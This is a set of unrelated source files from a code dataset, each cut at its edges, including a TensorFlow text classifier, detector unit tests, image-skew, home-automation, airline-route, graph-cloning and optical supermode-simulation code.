int(sys.argv[5])\nn_letter_embedding = int(sys.argv[7])\n\n# Network Parameters\nn_sent_words = 100 \nn_sent_letters = 600 \nn_word_hidden = int(sys.argv[4]) # hidden layer num of features\nn_letter_hidden = int(sys.argv[6])\nn_classes = int(sys.argv[1])\n\ndp = data_provider(size=n_classes, sent_max_len = n_sent_words, sent_max_char_len = n_sent_letters, number_of_post_per_user = number_of_post_per_user)\n\n# tf Graph input\nx = tf.placeholder(tf.int32, [None, n_sent_words])\nu = tf.placeholder(tf.int32, [None, n_sent_letters])\n\ny = tf.placeholder(tf.float32, [None, n_classes])\n\nword_dropout = tf.placeholder(tf.float32, shape=())\n\nis_training = tf.placeholder(tf.bool)\n\n# Define weights\nweights = {\n 'inner':tf.Variable(tf.random_normal([2*n_word_hidden + n_letter_hidden, 128])),\n 'out': tf.Variable(tf.random_normal([128, n_classes]))\n}\nbiases = {\n 'out': tf.Variable(tf.random_normal([n_classes])),\n 'inner': tf.Variable(tf.random_normal([128]))\n}\n\n\ndef RNN(x, u, weights, biases, dropout, is_training):\n\n with tf.variable_scope(\"word\"):\n x = tf.cond(tf.equal(is_training, tf.constant(True)), lambda: tf.nn.dropout(x, dropout), lambda:x)\n # Unstack to get a list of 'n_steps' tensors of shape (batch_size, n_sent_words)\n x = tf.unstack(x, n_sent_words, 1)\n # Define a lstm cell with 
tensorflow\n fw_lstm_cell = rnn.BasicLSTMCell(n_word_hidden)\n bw_lstm_cell = rnn.BasicLSTMCell(n_word_hidden)\n\n outputs, states, _= rnn.static_bidirectional_rnn(fw_lstm_cell, bw_lstm_cell, x, dtype=tf.float32)\n\n with tf.variable_scope(\"letter\"):\n u = tf.reshape(u, shape=[-1, n_sent_letters, n_letter_embedding, 1])\n\n conv1 = tf.layers.conv2d(u, n_letter_hidden, (4, n_letter_embedding), activation=tf.nn.relu)\n conv2 = tf.layers.conv2d(u, n_letter_hidden, (3, n_letter_embedding), activation=tf.nn.relu)\n conv3 = tf.layers.conv2d(u, n_letter_hidden, (2, n_letter_embedding), activation=tf.nn.relu)\n conv4 = tf.layers.conv2d(u, n_letter_hidden, (5, n_letter_embedding), activation=tf.nn.relu)\n\n conv1 = tf.layers.max_pooling2d(conv1, strides=1, pool_size=(597, 1))\n conv2 = tf.layers.max_pooling2d(conv2, strides=1, pool_size=(598, 1))\n conv3 = tf.layers.max_pooling2d(conv3, strides=1, pool_size=(599, 1))\n conv4 = tf.layers.max_pooling2d(conv4, strides=1, pool_size=(596, 1))\n \n conv_final = tf.layers.max_pooling2d(tf.concat([conv1, conv2, conv3, conv4], 1), strides=1, pool_size = (4, 1))\n \n output_letter = tf.contrib.layers.flatten(conv_final)\n output_letter = tf.layers.dropout(output_letter, rate=dropout, training=is_training)\n \n max_output = outputs[0]\n\n for i in range(1, len(outputs)):\n max_output = tf.maximum(max_output, outputs[i])\n \n final_output = tf.concat((max_output, output_letter), 1)\n\n final_output2 = tf.nn.relu(tf.matmul(final_output, weights['inner']) + biases['inner'])\n\n \n # Linear activation, using rnn inner loop last output\n return tf.matmul(final_output2, weights['out']) + biases['out']\n\n\nwith tf.device(\"/cpu:0\"):\n embedding = tf.get_variable(\"embedding\", [dp.vocab_size, n_word_embedding], dtype=tf.float32)\n inputs = tf.nn.embedding_lookup(embedding, x)\n\n letter_embedding = tf.get_variable(\"letter_embedding\", [dp.vocab_char_size, n_letter_embedding], dtype=tf.float32)\n inputs_letter = tf.nn.embedding_lookup(letter_embedding, u)\n\n\npred = RNN(inputs, inputs_letter, weights, biases, word_dropout, is_training)\n\nsoftmax_pred = tf.nn.softmax(pred)\n# Define loss and optimizer\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=y))\n\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)\n\n# Evaluate model\ncorrect_pred = tf.equal(tf.argmax(pred,1), tf.argmax(y,1))\naccuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n# Initializing the variables\ninit = tf.global_variables_initializer()\n\nlst_train_cost = []\nlst_valid_cost = []\n\nlst_train_accr = []\nlst_valid_accr = []\n# Launch the graph\nwith tf.Session() as sess:\n sess.run(init)\n \n # Keep training until reach max iterations\n for i in range(train_iteration):\n train_accr = 0.0\n valid_accr = 0.0\n train_cost = 0.0\n valid_cost = 0.0\n\n step = 0\n epoch_size = max(dp.train_size // batch_size, 1)\n while step < epoch_size:\n batch_x, batch_y, batch_char_u= dp.get_next_train_batch(batch_size)\n acc, loss, _ = sess.run([accuracy, cost, optimizer], feed_dict={x: batch_x, y: batch_y, u: batch_char_u, word_dropout: my_droup_out, is_training: True})\n train_accr += acc \n train_cost += loss\n \n step += 1\n \n lst_train_cost.append(train_cost/epoch_size)\n lst_train_accr.append(train_accr/epoch_size)\n \n \n valid_data, valid_label, valid_char_data = dp.get_next_valid_batch(dp.valid_size)\n\n acc , loss= sess.run([accuracy, cost], feed_dict={x: valid_data, y: valid_label, u:valid_char_data, word_dropout: 1.0, 
is_training:False})\n \n lst_valid_cost.append(loss)\n lst_valid_accr.append(acc)\n\n print(str(i) + \"-TrainLoss = {:.3f}\".format(train_cost/epoch_size) + \", TrainAccr= {:.3f}\".format(train_accr/epoch_size) + \", ValidLoss = {:.3f}\".format(loss) + \", ValidAccr= {:.3f}\".format(acc))\n \n \n accr = 0\n accr_per_post = 0\n\n number_of_post = 0\n for i in range(n_classes):\n test_data, test_label, test_char_data= dp.get_next_test_batch(i)\n loss, acc, prediction = sess.run([cost, accuracy, softmax_pred], feed_dict={x: test_data, y: test_label, u:test_char_data, word_dropout: 1.0, is_training:False})\n\n for predict in prediction:\n number_of_post += 1\n if predict.argmax(axis=0) == i:\n accr_per_post += 1\n\n result = np.sum(np.log10(prediction), axis=0)\n max_idx = result.argmax(axis=0)\n if max_idx == i :\n accr += 1\n \n\n #result = (np.sum(prediction, axis=0)/np.sum(np.sum(prediction, axis=0))).tolist()\n #temp = result[i]\n #result.sort(reverse=True)\n #max_index = result.index(temp)\n #print(' '.join([str(k) for k in result[:(max_index+1)]]))\n #print(\"Test Loss = {:.3f}\".format(loss) + \", Test Accuracy= {:.3f}\".format(acc))\n \n print('accr is {0:.3f} accr per post is {1:.3f}'.format(accr / n_classes, accr_per_post/number_of_post))\n\n #plt.plot(range(len(lst_train_cost)), lst_train_cost, 'g--', range(len(lst_valid_cost)), lst_valid_cost, 'b--')\n #plt.figure()\n\n #plt.plot(range(len(lst_train_accr)), lst_train_accr, 'g--', range(len(lst_valid_accr)), lst_valid_accr, 'b--')\n #plt.show()\n","sub_path":"future/rnncnn.py","file_name":"rnncnn.py","file_ext":"py","file_size_in_byte":7239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"93812176","text":"import torch\nfrom mmdet.models.builder import build_detector\n\nfrom otx.mpa.modules.models.detectors.custom_atss_detector import CustomATSS\nfrom tests.test_suite.e2e_test_system import e2e_pytest_unit\n\n\nclass TestCustomATSS:\n @e2e_pytest_unit\n def test_custom_atss_build(self):\n model_cfg = dict(\n type=\"CustomATSS\",\n backbone=dict(\n avg_down=False,\n base_channels=64,\n conv_cfg=None,\n dcn=None,\n deep_stem=False,\n depth=18,\n dilations=(1, 1, 1, 1),\n frozen_stages=-1,\n in_channels=3,\n init_cfg=None,\n norm_cfg=dict(requires_grad=True, type=\"BN\"),\n norm_eval=True,\n num_stages=4,\n out_indices=(0, 1, 2, 3),\n plugins=None,\n pretrained=None,\n stage_with_dcn=(False, False, False, False),\n stem_channels=None,\n strides=(1, 2, 2, 2),\n style=\"pytorch\",\n type=\"mmdet.ResNet\",\n with_cp=False,\n zero_init_residual=True,\n ),\n neck=dict(\n type=\"FPN\",\n in_channels=[64, 128, 256, 512],\n out_channels=64,\n start_level=1,\n add_extra_convs=\"on_output\",\n num_outs=5,\n relu_before_extra_convs=True,\n ),\n bbox_head=dict(\n type=\"CustomATSSHead\",\n num_classes=2,\n in_channels=64,\n stacked_convs=4,\n feat_channels=64,\n anchor_generator=dict(\n type=\"AnchorGenerator\",\n ratios=[1.0],\n octave_base_scale=8,\n scales_per_octave=1,\n strides=[8, 16, 32, 64, 128],\n ),\n bbox_coder=dict(\n type=\"DeltaXYWHBBoxCoder\", target_means=[0.0, 0.0, 0.0, 0.0], target_stds=[0.1, 0.1, 0.2, 0.2]\n ),\n loss_cls=dict(type=\"FocalLoss\", use_sigmoid=True, gamma=2.0, alpha=0.25, loss_weight=1.0),\n loss_bbox=dict(type=\"GIoULoss\", loss_weight=2.0),\n loss_centerness=dict(type=\"CrossEntropyLoss\", use_sigmoid=True, loss_weight=1.0),\n use_qfl=False,\n qfl_cfg=dict(type=\"QualityFocalLoss\", use_sigmoid=True, beta=2.0, loss_weight=1.0),\n ),\n )\n\n model = 
build_detector(model_cfg)\n        assert isinstance(model, CustomATSS)\n\n    @e2e_pytest_unit\n    def test_custom_atss_load_state_dict_pre_hook(self):\n        chkpt_classes = [\"person\", \"car\"]\n        model_classes = [\"tree\", \"car\", \"person\"]\n        chkpt_dict = {\n            \"bbox_head.atss_cls.weight\": torch.tensor(\n                [\n                    [1, 1, 1, 1],\n                    [2, 2, 2, 2],\n                ]\n            ),\n            \"bbox_head.atss_cls.bias\": torch.tensor(\n                [\n                    [1],\n                    [2],\n                ]\n            ),\n        }\n        model_dict = {\n            \"bbox_head.atss_cls.weight\": torch.tensor(\n                [\n                    [3, 3, 3, 3],\n                    [4, 4, 4, 4],\n                    [5, 5, 5, 5],\n                ]\n            ),\n            \"bbox_head.atss_cls.bias\": torch.tensor(\n                [\n                    [3],\n                    [4],\n                    [5],\n                ]\n            ),\n        }\n        gt_dict = {\n            \"bbox_head.atss_cls.weight\": torch.tensor(\n                [\n                    [3, 3, 3, 3],\n                    [2, 2, 2, 2],\n                    [1, 1, 1, 1],\n                ]\n            ),\n            \"bbox_head.atss_cls.bias\": torch.tensor(\n                [\n                    [3],\n                    [2],\n                    [1],\n                ]\n            ),\n        }\n\n        class Model:\n            def state_dict(self):\n                return model_dict\n\n        CustomATSS.load_state_dict_pre_hook(Model(), model_classes, chkpt_classes, chkpt_dict, \"\")\n        for k, gt in gt_dict.items():\n            assert (chkpt_dict[k] != gt).sum() == 0\n","sub_path":"tests/unit/mpa/modules/models/detectors/test_custom_atss_detector.py","file_name":"test_custom_atss_detector.py","file_ext":"py","file_size_in_byte":4300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"223058796","text":"import cv2\nimport numpy as np\n\ndef skew(coords, image, w, h):\n    noise_image = image\n    rows, cols, ch = noise_image.shape\n    # w,h = image.shape[:2] # gets the height and width of the image\n    # print(w,h)\n    sol_ust = coords[0] # the incoming coordinate values are assigned to the references in order\n    sag_ust = coords[1]\n    sol_alt = coords[2]\n    sag_alt = coords[3]\n\n    pts1 = np.float32([[sol_ust[0], sol_ust[1]], [sol_alt[0], sol_alt[1] + h], [sag_ust[0] + w, sag_ust[1]], [sag_alt[0] + w, sag_alt[1] + h]]) # the values of the chosen coordinates are assigned to pts1 as float32\n    pts2 = np.float32([[0, 0], [0, 3308], [2280, 0], [2280, 3308]]) # after cropping, the dimensions of a 2280x3308 frame are assigned to pts2\n    M = cv2.getPerspectiveTransform(pts1, pts2)\n    width, height = noise_image.shape[:2]\n    dst = cv2.warpPerspective(noise_image, M, (2280, 3308)) # once the crop is performed, the target image is assigned to the dst variable\n\n    # plt.subplot(121),plt.imshow(noise_image),plt.title('Input')\n    # plt.subplot(122),plt.imshow(dst),plt.title('Output')\n    # plt.show()\n    #cv2.imwrite('C:\\\\Users\\\\NovaPM\\\\Desktop\\\\test_image\\\\orj_sskew.jpg',dst)\n    return dst","sub_path":"skew_image.py","file_name":"skew_image.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"605979940","text":"import hassapi as hass\n\n#\n# Carport light controller\n#\n# App to turn lights on when motion detected then off again after a delay\n#\n# Use with constraints to activate only for the hours of darkness\n#\n# Args:\n#\n# delay: amount of time after turning on to turn off again. 
If not specified defaults \n# to 60 seconds.\n#\n# Release Notes\n#\n# Version 1.0:\n# Initial Version adapted from: \n# https://github.com/AppDaemon/appdaemon/blob/dev/conf/example_apps/motion_lights.py\n\n\nclass CarportLight(hass.Hass):\n\n def initialize(self):\n self.handle = None\n # Subscribe to sensors\n if \"sensor\" in self.args:\n for sensor in self.args['sensor']:\n self.listen_state(self.motion, sensor)\n else:\n self.log(\"No sensor specified, doing nothing\")\n\n def motion(self, entity, attribute, old, new, kwargs):\n if self.sun_down(): # check that it is still dark \n if new == \"on\":\n if \"entity_ctrl\" in self.args:\n for entity in self.args['entity_ctrl']:\n self.log(\"Motion detected: turning {} on\".format(entity))\n self.turn_on(entity)\n if \"delay\" in self.args:\n delay = self.args[\"delay\"]\n else:\n delay = 60\n self.cancel_timer(self.handle)\n self.handle = self.run_in(self.light_off, delay)\n\n def light_off(self, kwargs):\n if \"entity_ctrl\" in self.args:\n for entity in self.args['entity_ctrl']:\n self.log(\"Turning {} off\".format(entity))\n self.turn_off(entity)","sub_path":"src/appdaemon/apps/carport_light.py","file_name":"carport_light.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"125652604","text":"import difflib\nimport math\nfrom fuzzywuzzy import fuzz\n\ndiff = difflib.Differ()\n\n\ndef similarity_word(dst_str, src_str):\n ratio = float(fuzz.token_set_ratio(dst_str, src_str)) / 100.0\n avg_len = (len(dst_str) + len(src_str)) / 2\n sub_len = math.fabs(len(dst_str) - len(src_str)) / 2\n return ratio * (avg_len - sub_len) / avg_len\n\n\ndef equal(str1, str2):\n str1 = str1.upper().replace(\" \", \"\")\n str2 = str2.upper().replace(\" \", \"\")\n return similarity_word(str1, str2) > 0.9\n\n\ndef find_keyword(line_text, keyword):\n if len(line_text) <= len(keyword):\n ratio = float(fuzz.token_set_ratio(line_text, keyword)) / 100.0\n max_ratio = ratio * len(line_text) / len(keyword)\n last_same_pos = 0\n else:\n max_ratio = 0\n last_same_pos = 0\n for pos in range(len(line_text) - len(keyword)):\n sub_text = line_text[pos: pos + len(keyword)]\n ratio = float(fuzz.token_set_ratio(sub_text, keyword)) / 100.0\n if max_ratio < ratio:\n max_ratio = ratio\n last_same_pos = pos\n\n if max_ratio > 0.9:\n return last_same_pos\n else:\n return -1\n","sub_path":"utils/string_manage.py","file_name":"string_manage.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"313040082","text":"from __future__ import division, print_function\nimport sys, os, glob, time, warnings, gc\n# import matplotlib\n# matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom astropy.table import Table, vstack, hstack\nimport fitsio\nfrom astropy.io import fits\n\nfrom multiprocessing import Pool\n\nn_processes = 32\n\nimage_dir = '/global/cfs/cdirs/cosmo/staging/'\n\nsurveyccd_path = '/global/project/projectdirs/cosmo/work/legacysurvey/dr9/survey-ccds-decam-dr9.fits.gz'\n# surveyccd_path = '/global/cfs/cdirs/cosmo/work/legacysurvey/dr9-garage/reorg/decam/survey-ccds-decam-dr8-newlocs2.fits.gz'\n\nccd = Table(fitsio.read(surveyccd_path, columns=['expnum', 'image_filename', 'filter']))\nprint(len(ccd))\n\n# Only keep unique exposures\n_, idx = np.unique(ccd['expnum'], return_index=True)\nccd = ccd[idx]\nprint(len(ccd))\n\ndef get_pupil_params(index):\n\n image_path = 
os.path.join(image_dir, ccd['image_filename'][index].strip())\n with fitsio.FITS(image_path) as f:\n try:\n header = f[0].read_header()\n if 'PUPILSKY' in header:\n pupilsky = header['PUPILSKY']\n else:\n pupilsky = np.nan\n if 'PUPILMAX' in header:\n pupilmax = header['PUPILMAX']\n else:\n pupilmax = np.nan\n if 'PUPILAMP' in header:\n pupilamp = header['PUPILAMP']\n else:\n pupilamp = np.nan\n except:\n pupilsky = np.nan\n pupilmax = np.nan\n pupilamp = np.nan\n\n return pupilsky, pupilmax, pupilamp\n\ndef main():\n\n # ccd['PUPILSKY'] = 0.\n # ccd['PUPILMAX'] = 0.\n # ccd['PUPILAMP'] = 0.\n\n # for index in np.arange(len(ccd)):\n\n # if index%100==0:\n # print(index, '/', len(ccd))\n\n # res = get_pupil_params(index)\n # ccd['PUPILSKY'][index] = res[0]\n # ccd['PUPILMAX'][index] = res[1]\n # ccd['PUPILAMP'][index] = res[2]\n\n # ccd.write('/global/cscratch1/sd/rongpu/dr9dev/pupil_pattern/survey-ccds-decam-dr8-pupil-params.fits')\n\n # print('Done!!!!!!!!!!!!!!!!!!!!!')\n\n with Pool(processes=n_processes) as pool:\n res = pool.map(get_pupil_params, np.arange(len(ccd)))\n\n res = np.array(res)\n ccd['PUPILSKY'] = res[:, 0]\n ccd['PUPILMAX'] = res[:, 1]\n ccd['PUPILAMP'] = res[:, 2]\n\n ccd.write('/global/cscratch1/sd/rongpu/dr9dev/pupil_pattern/survey-ccds-decam-dr9-pupil-params.fits')\n\n print('Done!!!!!!!!!!!!!!!!!!!!!')\n\nif __name__==\"__main__\":\n main()\n\n","sub_path":"pupil_pattern/assemble_pupil_parameters.py","file_name":"assemble_pupil_parameters.py","file_ext":"py","file_size_in_byte":2518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"316756303","text":"import pandas as pd\n\n# Read in the airports data.\nairports = pd.read_csv(\"data/airports.dat\", header=None, na_values='\\\\N')\nairports.columns = [\"ID\", \"NAME\", \"CITY\", \"COUNTRY\", \"IATA\", \"ICAO\", \"LATITUDE\", \"LONGITUDE\", \"ALTITUDE\", \"TIMEZONE\",\n \"DST\", \"TZ\", \"TYPE\", \"SOURCE\"]\n\n# Read in the airlines data.\nairlines = pd.read_csv(\"data/airlines.dat\", header=None, na_values='\\\\N')\nairlines.columns = [\"ID\", \"NAME\", \"ALIAS\", \"IATA\", \"ICAO\", \"CALLSIGN\", \"COUNTRY\", \"ACTIVE\"]\n\n# Read in the routes data.\nroutes = pd.read_csv(\"data/routes.dat\", header=None, na_values='\\\\N')\nroutes.columns = [\"AIRLINE\", \"AIRLINE_ID\", \"SOURCE\", \"SOURCE_ID\", \"DEST\", \"DEST_ID\", \"CODESHARE\", \"STOPS\", \"EQUIPMENT\"]\n# routes = routes[(routes['SOURCE'] == \"LEX\")|(routes['SOURCE'] == \"ORD\")]\n\n# Read in the planes data.\nplanes = pd.read_csv(\"data/planes.dat\", header=None, na_values='\\\\N')\nplanes.columns = [\"NAME\", \"IATA\", \"ICAO\"]\n\n# Read in the countries data.\ncountries = pd.read_csv(\"data/countries.dat\", header=None, na_values='\\\\N')\ncountries.columns = [\"NAME\", \"ISO\", \"DAFIF\"]\n\nsetConnections = set()\ndNodes = []\n\n\ndef get_cityIATAname(city_name):\n df = airports[airports[\"CITY\"].str.casefold() == str(city_name).casefold()]\n if len(df) > 0:\n nameIATA = airports[airports[\"CITY\"].str.casefold() == str(city_name).casefold()][\"IATA\"]\n return nameIATA.item()\n\n\ndef get_direct_connection(flyFromCity_IATA, flyToCity_IATA):\n df = routes[(routes['SOURCE'] == flyFromCity_IATA) & (routes['DEST'] == flyToCity_IATA)]\n transfer = 0\n bTransfer = False\n if df.empty:\n bTransfer = False\n else:\n bTransfer = True\n return bTransfer\n\n\ndef get_connection(start, goal):\n global dNodes, setConnections\n setConnections.add(str(start))\n strConnection = \"\"\n df = 
routes[(routes['SOURCE'] == start)]\n    connections = df[\"DEST\"].unique()\n    connections.sort()\n    output = 0\n    for connection in connections:\n        if connection is not None:\n            if not connection in setConnections:\n                setConnections.add(connection)\n                bTransfer = get_direct_connection(connection, goal)\n                if not bTransfer:\n                    dNodes.append(connection)\n                    get_connection(connection, goal)\n                else:\n                    dNodes.append(connection)\n                    dNodes.append(goal)\n                    break\n\n\ndef main():\n    flyFromCity = \"Lexington KY\"\n    flyToCity = \"Mumbai\"\n    noTransfers = 2\n\n\n    # # Describe the situation: from --> to city, number of transfers acceptable\n    # global dNodes, setConnections\n    # flyFromCity = \"Lexington KY\"\n    # flyToCity = \"Mumbai\"\n    # noTransfers = 2\n    # strConnection = \"\"\n    # # get IATA code for the respective cities\n    # flyFromCity_IATA = get_cityIATAname(flyFromCity)\n    # flyToCity_IATA = get_cityIATAname(flyToCity)\n    # # transfers = get_direct_connection(flyFromCity_IATA, flyToCity_IATA,noTransfers)\n    # bTransfer = get_direct_connection(flyFromCity_IATA, flyToCity_IATA)\n    # if not bTransfer:\n    #     if not str(flyFromCity_IATA) in setConnections:\n    #         setConnections.add(flyFromCity_IATA)\n    #         dNodes.append(flyFromCity_IATA)\n    #         get_connection(flyFromCity_IATA, flyToCity_IATA)\n    # else:\n    #     if not str(flyFromCity_IATA) in setConnections:\n    #         dNodes.append(flyFromCity_IATA)\n    #         dNodes.append(flyToCity_IATA)\n    #\n    # # map out possibility of reaching destination from the source\n    # if len(dNodes) <= (noTransfers + 2):\n    #     for item in dNodes:\n    #         strConnection = str(item) + \"--> \"\n    #     print(\"You can fly via \" + strConnection)\n    # else:\n    #     print(\"Connections could not be established with \" + str(noTransfers) + \" of transfers\")\n    #\n    # # i = 0\n    # # # if dfDirect.empty:\n    # # if transfers < 0:\n    # #     transfers=1\n    # #     dNodes.add(flyFromCity)\n    # #     i = get_connection(flyFromCity_IATA, flyToCity_IATA,transfers,noTransfers)\n    # #     if i <= noTransfers:\n    # #         print(flyFromCity + \"-->\")\n    # # else:\n    # #     dNodes.add(str(flyFromCity_IATA), str(flyToCity_IATA))\n    # #     print(str(flyFromCity_IATA) + \"-->\" + str(flyToCity_IATA))\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"07-Data Wrangling/Kevin.Bacon.py","file_name":"Kevin.Bacon.py","file_ext":"py","file_size_in_byte":4300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"572123845","text":"\"\"\"\nYou are given a reference to a node in a connected undirected graph. Return a deep copy (clone) of the graph.\nEach node in the graph contains a value val (int) and a list of its neighbors (list[Node]).\nclass Node {\n    public int val;\n    public List neighbors;\n}\nTest case format:\nFor simplicity, each node's value is the same as its index. For example, the first node has value 1 (val = 1), the second node has value 2 (val = 2), and so on. The graph is represented in the test cases by an adjacency list.\nAn adjacency list is a collection of unordered lists used to represent a finite graph. Each list describes the set of neighbors of a node in the graph.\nThe given node will always be the first node in the graph (with value 1). You must return the copy of the given node as a reference to the cloned graph.\nExample 1:\nInput: adjList = [[2,4],[1,3],[2,4],[1,3]]\nOutput: [[2,4],[1,3],[2,4],[1,3]]\nExplanation:\nThere are 4 nodes in the graph.\nNode 1 (val = 1) has two neighbors: nodes 2 and 4.\nNode 2 (val = 2) has two neighbors: nodes 1 and 3.\nNode 3 (val = 3) has two neighbors: nodes 2 and 4.\nNode 4 (val = 4) has two neighbors: nodes 1 and 3.\nExample 2:\nInput: adjList = [[]]\nOutput: [[]]\nExplanation: The input contains one empty list. The graph has exactly one node with value 1, and it has no neighbors.\nExample 3:\nInput: adjList = []\nOutput: []\nExplanation: The graph is empty and contains no nodes.\nExample 4:\nInput: adjList = [[2],[1]]\nOutput: [[2],[1]]\nConstraints:\nThe number of nodes does not exceed 100.\nEach node value Node.val is unique, with 1 <= Node.val <= 100.\nThe undirected graph is a simple graph: it has no repeated edges and no self-loops.\nBecause the graph is undirected, if node p is a neighbor of node q, then node q must also be a neighbor of node p.\nThe graph is connected, so every node can be reached from the given node.\n\"\"\"\n\n\nclass Node:\n    def __init__(self, val=0, neighbors=None):\n        self.val = val\n        self.neighbors = neighbors if neighbors is not None else []\n\n\nclass Solution:\n    def cloneGraph(self, node: 'Node') -> 'Node':\n        # Breadth-first traversal over the original graph.\n        if not node:\n            return node\n        visted = {}\n        statck = 
[node]\n visted[node] = Node(node.val, [])\n while len(statck) > 0:\n tree = statck.pop(0)\n for neighbor in tree.neighbors:\n if neighbor not in visted:\n visted[neighbor] = Node(neighbor.val, [])\n statck.append(neighbor)\n visted[tree].neighbors.append(visted[neighbor])\n return visted[node]\n","sub_path":"medium/leetcode133.py","file_name":"leetcode133.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"456867564","text":"import math\r\n\r\ntolerance = 0.000001\r\nestimate = 1.0\r\nx = float(input(\"Enter a number: \"))\r\n\r\ndef newton(num, estimate):\r\n estimate = (estimate + num / estimate) / 2\r\n difference = abs(num - estimate ** 2)\r\n\r\n if difference <= tolerance:\r\n return estimate\r\n else:\r\n return newton(num, estimate)\r\n\r\nprint(\"The program's estimate: \", newton(x, estimate))\r\nprint(\"Python's estimate: \", math.sqrt(x))\r\n\r\n\r\n","sub_path":"Week 8 Projects/Project #2.py","file_name":"Project #2.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"593657342","text":"\"\"\"\nPrint MuSE graph (formatted to be input for DCEP-Ambrosia), transmission ratio and computation time.\nWrite result to musecosts_*.csv\n\"\"\"\nimport pickle\nimport csv\nimport sys\nfrom multi_muse import *\n\n\n\ndef format_output(res, placementnode):\n\n string = \"SELECT \" + str(res) + \" FROM \" + format_input_combi(finalcombi[res][placementnode]) + \" ON \" + format_input_nodes(finalplacement_dict[res][placementnode]) + \"/n(\" + get_source(res, placementnode) +\")\"\n if not res in wl:\n string += \" WITH selectionRate = \" + str(projrates[res][0])\n print(string)\n for element in finalcombi[res][placementnode]: \n if len(element) > 1 and not len(finalcombi[res][placementnode]) == 1: \n format_output(element, combis2[res][placementnode][finalcombi[res][placementnode]][element])\n \n \ndef format_input_combi(combi):\n mystring = \" \"\n for i in combi:\n mystring += str(i) + \", \"\n mystring = mystring[:-2]\n return mystring\n\ndef format_input_nodes(nodes):\n mystring = \"{\"\n for i in nodes:\n mystring += str(i) + \", \"\n mystring = mystring[:-2]\n mystring += \"}\"\n return mystring\n\n\n\ndef main():\n \n print(\"MuSE Graph\")\n print(\"-----------\") \n for i in bestplacements.keys():\n format_output(i, bestplacements[i])\n print(\"\\n\") \n \n print(\"central costs \" + str(centralcosts()))\n print(\"final costs muse: \" + str(musecosts)) \n print(\"transmission ratio \" + str(transmissionratio))\n print(\"total computation time: \" + totaltime ) \n \n if len(sys.argv)>1:\n experiment_id = sys.argv[1]\n else:\n experiment_id = 1\n if len(sys.argv)>2:\n filename = sys.argv[2]\n else:\n filename = \"none\"\n \n \n with open(\"aMuSE_\"+str(filename)+\".csv\", \"a\") as result:\n writer = csv.writer(result)\n writer.writerow([experiment_id, transmissionratio, len(list(combinationcosts.keys()))-len(wl), round(time.time() - start_time,2) + combigen_time])\n\n \nif __name__ == \"__main__\":\n main()","sub_path":"aMuSE/code/aMuse.py","file_name":"aMuse.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"28335431","text":"import logging\nimport numpy as np\nimport copy as cp\nimport matplotlib.pyplot as plt\nfrom progressbar import ProgressBar\nfrom itertools import combinations, 
from mayavi import mlab\n\nfrom SuPyModes.Config import *\nfrom SuPyModes.utils import RecomposeSymmetries, GetWidgetBar, SortSuperSet, Enumerate\nfrom SuPyModes.BaseClass import SetPlots, SetProperties\nfrom SuPyModes.Special import ModeCoupling, ModeAdiabatic\n\n\n\nMlogger = logging.getLogger(__name__)\n\nclass SuperMode(object):\n\n    def __init__(self, Name, Geometry):\n        self.Name = Name\n        self.Slice = []\n        self._Adiabatic = None\n        self._Coupling = None\n        self.Geometry = Geometry\n\n\n\n    def Append(self, **kwargs):\n        self.Slice.append(kwargs['Field'])\n\n\n    def __getitem__(self, N):\n        return self.Slice[N]\n\n\n    def __setitem__(self, N, val):\n        self.Slice[N] = val\n\n\n    @property\n    def DegenerateFactor(self):\n        Factor = 1\n\n        if self.Geometry.Axes.Symmetries[0] in [1,-1]: Factor *= 2\n\n        if self.Geometry.Axes.Symmetries[1] in [1,-1]: Factor *= 2\n\n        return Factor\n\n\n    def GetCoupling(self, SuperMode):\n        C = []\n        for n, itr in enumerate(self.Geometry.ITRList[:-1]):\n            C.append( ModeCoupling(SuperMode0 = self,\n                                   SuperMode1 = SuperMode,\n                                   k = self.Geometry.Axes.Direct.k,\n                                   Profile = self.Geometry.mesh,\n                                   Gradient = self.Geometry.Gradient(),\n                                   iter = n) )\n\n        return C\n\n\n    def GetAdiabatic(self, SuperMode):\n        A = []\n        for n, itr in enumerate(self.Geometry.ITRList[:-1]):\n            A.append( ModeAdiabatic(SuperMode0 = self,\n                                    SuperMode1 = SuperMode,\n                                    k = self.Geometry.Axes.Direct.k,\n                                    Profile = self.Geometry.mesh,\n                                    Gradient = self.Geometry.Gradient(),\n                                    iter = n) )\n\n        return A\n\n\n    def PlotPropagation(self):\n        image, _, _ = self.FullField(0)\n\n        image = np.abs(image)\n\n        mlab.surf(image, warp_scale=\"auto\")\n\n        @mlab.animate(delay=100)\n        def anim_loc():\n            for i in range(len(self.Slice)):  # fixed: was self.Field, which SuperMode never defines\n                image, _, _ = self.FullField(i)\n                mlab.surf( np.abs(image), warp_scale=\"auto\")\n                yield\n\n        anim_loc()\n        mlab.show()\n        \"\"\"\n        import os\n        fps = 20\n        prefix = 'ani'\n        ext = '.png'\n\n        import subprocess\n        animate_plots(base_directory='yolo', fname_prefix='dasda')\"\"\"\n\n\n    def FullField(self, iter):\n        Field = self.Slice[iter]\n\n        Field, 